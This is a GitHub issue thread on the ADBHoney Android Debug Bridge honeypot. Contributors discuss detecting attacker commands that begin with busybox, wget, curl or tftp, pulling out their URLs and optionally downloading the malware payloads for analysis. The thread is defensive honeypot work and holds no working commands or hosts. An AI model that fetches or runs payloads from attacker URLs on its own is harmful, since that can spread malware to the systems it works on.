search

huuck / ADBHoney

Low interaction honeypot designed for Android Debug Bridge over TCP/IP
GNU General Public License v3.0
158 stars 33 forks source link

Extract links from the commands #5

Open fe7ch opened 5 years ago

fe7ch commented 5 years ago

I've noticed that sometimes attacker is only executing some commands instead of dropping binary directly.

The commands usually includes wget/curl call, so it would be nice to parse the command line & try to download the payload.

fe7ch commented 5 years ago

As @HermanusF and @bontchev mentioned, this functionality should be optional, so some command line/config option should be present to disable it if needed. Imho it should be turned on by default.

bontchev commented 5 years ago

Indeed. I was thinking of the following: split the input line by the semicolon character, for each part, check if it begins with (optionally) busybox, followed by wget, curl or tftp. Then extract the URL from the command (this is particularly hard for tftp; the others can be handled just with a regular expression), download the file (optionally) and save it in the usual format (file name derived from the hash of its contents). Maybe log if download was successful (e.g., it might fail if the repository from where it tries to download no longer exists).